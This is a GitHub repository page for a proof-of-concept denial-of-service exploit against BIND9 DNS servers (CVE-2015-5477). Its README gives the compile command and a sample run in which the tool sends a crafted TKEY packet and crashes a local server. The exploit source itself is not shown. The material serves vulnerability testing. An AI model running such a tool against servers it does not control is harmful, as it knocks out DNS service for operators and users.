Skip to content

robertdavidgraham/cve-2015-5477

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
bin
 
 
README.md
 
 
tkill.c
 
 

README.md

PoC for BOND9 TKEY assert DoS (CVE-2015-5477)

This exploit tests to see if a BIND9 server is vulnerable by sending the exploit in order to see if it crashes.

It's C code that you compile the normal way on Unix/Window, such as:

# gcc tkill.c -o tkill

It'll run over both IPv4 and IPv6.

This is what it looks like running against localhost. Since it gets two IP addresses resolving the name, it'll try both of them. It first queries the "version" string, then sends the exploit. When it probes the second address, the version query fails because the service is already crashed from the first attempt.

root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

About

PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure

Resources

Readme
Activity

Stars

65 stars

Watchers

8 watching

Forks

50 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages